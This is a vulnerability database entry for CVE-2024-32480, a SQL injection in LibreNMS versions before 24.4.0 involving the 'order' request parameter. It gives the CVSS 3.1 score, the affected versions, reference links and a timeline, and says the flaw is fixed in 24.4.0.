LibreNMS vulnerable to SQL injection in prior versions
CVE-2024-32480

7.2HIGH

Key Information:

Vendor: Librenms
Status: Librenms
Vendor: CVE Published:; 22 April 2024

What is CVE-2024-32480?

LibreNMS is an open-source network monitoring system that utilizes PHP, MySQL, and SNMP. A vulnerability exists in versions prior to 24.4.0, where improper handling of the order parameter, derived from $request, allows an attacker to manipulate SQL queries. This occurs because the parameter is directly concatenated within an SQL statement after a basic string check. Successful exploitation of this vulnerability may allow an attacker to access and extract sensitive data from the database. The issue has been resolved in version 24.4.0, making it crucial for users to update their systems.

Affected Version(s)

librenms < 24.4.0

References

https://github.com/librenms/librenms/security/advisories/...

x_refsource_CONFIRM

https://github.com/librenms/librenms/commit/83fe4b10c440d...

x_refsource_MISC

CVSS V3.1

Score:

7.2

Severity:

HIGH

Confidentiality:

High

Integrity:

High

Availability:

High

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

High

User Interaction:

None

Scope:

Unchanged

Timeline

Vulnerability published
Apr 22, 2024
Vulnerability Reserved
Apr 12, 2024

Librenms

What is CVE-2024-32480?

Affected Version(s)

References

CVSS V3.1

Timeline